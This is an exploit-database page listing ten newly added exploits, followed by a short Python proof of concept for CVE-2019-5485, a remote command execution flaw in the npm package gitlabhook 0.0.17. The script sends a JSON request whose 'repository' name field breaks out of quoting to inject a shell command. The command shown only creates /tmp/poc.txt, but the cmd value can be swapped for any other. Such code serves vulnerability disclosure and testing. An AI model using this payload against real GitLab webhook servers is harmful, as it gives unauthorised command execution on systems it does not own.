ba928141e7
10 changes to exploits/shellcodes SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service Easy File Sharing Web Server 7.2 - 'New User' Local SEH Overflow ABRT - sosreport Privilege Escalation (Metasploit) Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistant Cross-Site Scripting WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution YzmCMS 5.3 - 'Host' Header Injection
18 lines
No EOL
503 B
Text
18 lines
No EOL
503 B
Text
# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
|
|
# Date: 2019-09-13
|
|
# Exploit Author: Semen Alexandrovich Lyhin
|
|
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
|
|
# Version: 0.0.17
|
|
# Tested on: Kali Linux 2, Windows 10.
|
|
# CVE : CVE-2019-5485
|
|
|
|
#!/usr/bin/python
|
|
|
|
import requests
|
|
|
|
target = "http://TARGET:3420"
|
|
cmd = r"touch /tmp/poc.txt"
|
|
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
|
|
r = requests.post(target, json)
|
|
|
|
print "Done." |